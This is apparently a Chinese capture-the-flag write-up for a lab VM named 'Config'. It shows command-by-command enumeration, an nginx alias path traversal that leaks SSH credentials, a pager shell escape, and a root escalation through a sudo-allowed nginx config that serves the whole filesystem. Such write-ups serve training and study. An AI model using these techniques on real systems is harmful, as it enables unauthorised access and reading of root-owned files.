Config [群友靶机][复现]

信息收集

┌──(root㉿kali)-[~]
└─# arp-scan -l | grep PCS
192.168.1.17    08:00:27:c2:13:f5       PCS Systemtechnik GmbH
                                                                                                                                                           
┌──(root㉿kali)-[~]
└─# IP=192.168.1.17

┌──(root㉿kali)-[~]
└─# nmap -sV -sC -A $IP -Pn
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-08 14:04 CST
Nmap scan report for 192.168.1.17
Host is up (0.00025s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey: 
|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)
|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)
|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: ConfigMaster - \xE6\x99\xBA\xE8\x83\xBD\xE8\xBF\x90\xE7\xBB\xB4\xE9\x85\x8D\xE7\xBD\xAE\xE7\xAE\xA1\xE7\x90\x86\xE5\xB9\xB3\xE5\x8F\xB0
MAC Address: 08:00:27:C2:13:F5 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.17

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.96 seconds

目录扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.17
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,php3,bak,gz,shtml,txt,html,bk,zip,tar
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21720]
/config               (Status: 301) [Size: 169] [--> http://192.168.1.17/config/]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

扫出来 config 目录，接着扫 /config

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.17/config
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,bk,bak,zip,tar,shtml,php3,txt,gz
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 21720]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================

下载下来 diff 一下

┌──(root㉿kali)-[~]
└─# curl http://$IP/index.html > index.html     
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 21720  100 21720    0     0  20.1M      0 --:--:-- --:--:-- --:--:-- 20.7M
                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# curl http://$IP/config/index.html > config_index.html
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 21720  100 21720    0     0  15.4M      0 --:--:-- --:--:-- --:--:-- 20.7M
                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# diff index.html config_index.html     

没区别

参考文章 Vulhub-POC/Nginx 配置错误漏洞.md at master・lg996/Vulhub-POC，可能存在路径穿越

┌──(root㉿kali)-[~]
└─# curl http://$IP/config../                            
<html>
<head><title>403 Forbidden</title></head>
<body>
<center><h1>403 Forbidden</h1></center>
<hr><center>nginx/1.18.0</center>
</body>
</html>

报 403 了，确实存在路径穿越，接着扫目录

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://$IP/config../ -x php,php3,txt,html,bk,bak,zip,tar,gz,shtml
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.1.17/config../
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php3,txt,html,bk,bak,shtml,zip,tar,gz,php
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/html                 (Status: 301) [Size: 169] [--> http://192.168.1.17/config../html/]
/config.txt           (Status: 200) [Size: 41]
Progress: 2426160 / 2426171 (100.00%)
===============================================================
Finished
===============================================================
                                                                                                                                                            
┌──(root㉿kali)-[~]
└─# curl http://$IP/config../config.txt
SSH Credentials: mikannse/mikannsebyebye

拿到 SSH 的账号密码

==================================
|    !!! WARNING !!!             |
|  Unauthorized access prohibited|
|  This system is monitored      |
==================================
/home/mikannse/banner.txt (END)

输入 !bash 拿到 shell

mikannse@Config:~$ ls -a
.  ..  banner.txt  .bash_history  .bash_logout  .bashrc  .lesshst  mikannse.conf  .profile  user.txt
mikannse@Config:~$ cat user.txt
flag{user-530773d6-5951-11f0-89d9-836ccaf94d6b}

提权

列出当前用户允许通过 sudo 执行的命令

mikannse@Config:~$ sudo -l
Matching Defaults entries for mikannse on Config:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mikannse may run the following commands on Config:
    (root) NOPASSWD: /usr/sbin/nginx -c /home/mikannse/mikannse.conf

发现可以以 root 身份无需密码执行 /usr/sbin/nginx -c /home/mikannse/mikannse.conf，这意味着可以通过创建或修改 /home/mikannse/mikannse.conf 文件利用 Nginx 配置中的功能来提权

mikannse@Config:~$ cat mikannse.conf
user mikannse;
worker_processes auto;
pid /run/nginx.pid;

events {
    worker_connections 1024;
}

http {
    default_type  application/octet-stream;
    sendfile      on;
    keepalive_timeout  65;

    server {
        listen       8080;          
        server_name  Config;     
        root         /tmp;          

        location / {
            autoindex on;            
            try_files $uri $uri/ =404;
        }

        access_log  /var/log/nginx/mikannse_access.log;
        error_log   /var/log/nginx/mikannse_error.log;
    }
}

修改配置文件，把 user mikannse; 改为 user root; ，把 root /tmp; 改为 root /;

执行 sudo /usr/sbin/nginx -c /home/mikannse/mikannse.conf，然后访问 http://192.168.1.17:8080/root 就可以看到 flag 文件了

┌──(root㉿kali)-[~]
└─# curl http://192.168.1.17:8080/root/root.txt
flag{root-bf116e68-5953-11f0-b06c-63e27ce93d04}